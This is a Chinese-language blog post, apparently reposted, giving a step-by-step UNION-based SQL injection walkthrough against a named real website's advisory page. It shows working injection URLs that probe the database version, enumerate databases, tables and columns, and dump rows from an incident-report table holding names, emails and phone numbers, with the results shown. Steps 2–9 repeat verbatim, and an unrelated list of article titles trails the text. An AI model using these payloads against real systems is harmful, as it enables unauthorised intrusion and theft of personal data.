记暴库高级方法讲解
来源:互联网 发布:网络自学网 编辑:程序博客网 时间:2024/06/06 20:15
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
4.判断有没有写权限
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
没办法,手动猜表啦
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
6.爆表,爆的是twcert库
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
爆出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5
7.爆列名,这次爆的是irsys表
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
爆出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
返回是3,说明每个列里有3个地段
9.爆字段内容
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
爆出name列的第一个字段的内容
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
爆出name列的第二个字段的内容
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
4.判断有没有写权限
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
没办法,手动猜表啦
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
6.爆表,爆的是twcert库
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
爆出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5
7.爆列名,这次爆的是irsys表
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
爆出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
返回是3,说明每个列里有3个地段
9.爆字段内容
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
爆出name列的第一个字段的内容
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
爆出name列的第二个字段的内容
- 记暴库高级方法讲解
- java高级特效讲解
- 高级shell编程讲解
- Kotlin高级函数讲解
- 转载一篇 正则表达式随笔(高级讲解
- 高级软件工程师(邹华栋)作用域讲解
- SPL讲解(7)--Query高级篇
- Android Serivce 高级篇AIDL讲解
- iOS高级开发实战技巧讲解
- 高级表单、表格+bfc讲解与使用
- jqGrid方法讲解集合
- [runtime] initialize方法讲解
- ServletContext方法实例讲解
- js string 方法讲解
- 静态工厂方法讲解
- available()方法的讲解 .
- Main方法格式讲解
- Path相关方法讲解
- mysql 集群以及部署
- C#后台调用前台javascript的五种方法
- 开启3389系列
- 设计模式--单例模式(Singleton)
- js操作select标签
- 记暴库高级方法讲解
- 如何处理$.getjson 返回值 为空的问题
- ASP.net程序中常用的三十三种代码
- live555向WM移植
- LRC校验码 c,delphi c# 别人现成的
- sogou interview ==> C 实现 C++ 封装 继承 多态
- 详解FSMO的五种角色和FSMO角色辨别方法及角色转换方法
- Android中常用适配器及定义自己的适配器
- 从加载igb驱动引出一些想法